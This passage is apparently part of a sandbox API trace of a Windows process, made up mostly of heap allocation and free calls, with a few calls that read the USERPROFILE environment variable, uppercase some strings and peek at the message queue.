(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0151.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0151.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0151.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0151.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0151.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0151.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0151.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0151.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b58 [0151.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0151.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0151.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0151.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0151.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0151.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0151.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0151.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0151.591] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0151.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0151.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0151.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0151.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0151.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0151.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0151.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0151.591] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0151.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0151.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0151.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0151.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0151.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0151.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0151.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0151.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0151.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0151.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0151.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0151.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0151.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0151.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0151.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0151.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b68 [0151.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0151.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0151.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719a8 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0151.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0151.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0151.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0151.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0151.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0151.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0151.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0151.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0151.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0151.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0151.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0151.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0151.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0151.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0151.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0151.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0151.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0151.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0151.595] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0151.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0151.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0151.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0151.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0151.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0151.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0151.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0151.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0151.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0151.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0151.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0151.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0151.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0151.596] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0151.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0151.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0151.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0151.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0151.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0151.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0151.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0151.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0151.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0151.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0151.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0151.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0151.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.598] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0151.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0151.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0151.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0151.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0151.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.599] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0151.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0151.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0151.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0151.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.599] 